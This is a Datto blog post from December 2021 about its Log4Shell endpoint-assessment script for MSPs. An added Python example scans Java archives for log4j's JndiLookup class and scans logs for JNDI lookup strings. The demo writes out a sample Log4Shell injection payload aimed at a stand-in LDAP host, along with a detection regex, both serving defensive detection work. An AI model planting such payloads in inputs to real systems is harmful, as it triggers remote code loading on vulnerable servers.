December 17, 2021

Log4Shell RMM Community Script Explained (Video)

By Ryan Weeks
Threat Analysis

In response to the critical vulnerability referred to as Log4j, Datto released a Community Script for all MSPs earlier this week on GitHub, as detailed in this blog: Log4Shell Enumeration, Mitigation and Attack Detection Tool. I’m encouraged to report that almost half of Datto RMM partners have taken action to execute this tool. Let’s keep this momentum going throughout the MSP community.

As an MSP, you protect a large number of systems, and you are helping your customers map which systems and applications may be vulnerable to the actively exploited log4j RCE, referred to as Log4Shell. You’re trying to figure out how to quickly and confidently assess this exposure at scale.

The two main methods that have emerged to enumerate potentially vulnerable systems are:

  • Network Assessment – tools that attempt benign exploitation in order to enumerate vulnerability.
  • Endpoint Assessment – using your inventory of protected systems, you can run system-based checks for running software that uses log4j, or for signs of attack attempts.

Datto noticed an abundance of tools released for Network Assessment in the first 24 hours, but few tools for Endpoint Assessment that were easily accessible to MSPs and SMBs. To address this, the Datto RMM team packaged up some of the great work done by the security community into an easy-to-execute tool that augments Network Assessment capability with Endpoint Assessment.
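The Endpoint Assessment approach described above, as an added Python example (not Datto's Community Script and not code from the original post): it walks a directory tree, flags Java archives that contain log4j's `JndiLookup.class`, including archives nested inside WAR/EAR files, and flags log lines containing a `${jndi:` lookup string. The function names, file names and sample log line are constructed for illustration.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Class behind the JNDI lookup in log4j-core 2.x; a hit still needs its version confirmed.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear")
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.I)  # plain form only, not obfuscated variants

def has_jndi_lookup(source, depth=0):
    """True if a zip archive (path or file object) or one nested in it holds JNDI_CLASS."""
    try:
        with zipfile.ZipFile(source) as zf:
            for name in zf.namelist():
                if name.endswith(JNDI_CLASS):
                    return True
                nested = name.lower().endswith(ARCHIVES) and depth < 4
                if nested and has_jndi_lookup(io.BytesIO(zf.read(name)), depth + 1):
                    return True
    except (zipfile.BadZipFile, OSError, RuntimeError):
        pass  # corrupt, encrypted or unreadable archive: skip it
    return False

def scan_endpoint(root):
    """Return (archives holding JndiLookup.class, (log file, line number) hits)."""
    candidates, attempts = [], []
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        if path.suffix.lower() in ARCHIVES and has_jndi_lookup(path):
            candidates.append(path.name)
        elif path.suffix.lower() == ".log":
            try:
                lines = path.read_text(errors="replace").splitlines()
            except OSError:
                continue  # unreadable log: skip it
            attempts += [(path.name, n) for n, line in enumerate(lines, 1)
                         if JNDI_PATTERN.search(line)]
    return candidates, attempts

def demo():
    """Scan a constructed tree: a WAR bundling a log4j-core JAR, plus an access log."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:
        jar.writestr(JNDI_CLASS, b"")
    with tempfile.TemporaryDirectory() as tmp:
        with zipfile.ZipFile(Path(tmp, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core.jar", inner.getvalue())
        Path(tmp, "access.log").write_text("GET / 200\nUA: ${jndi:ldap://example.invalid/a}\n")
        return scan_endpoint(tmp)
```

Calling `demo()` scans the constructed tree; `scan_endpoint()` can be pointed at a real application or log directory instead. A log hit records an attempt, not a successful compromise.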

Watch this in-depth explainer video on how to access, apply, run, and interpret the results of the Community Script:

 

For our Datto RMM partners, we’ve created a similar video for the Log4Shell Enumeration, Mitigation and Attack Detection Tool that can be found on Datto Community.
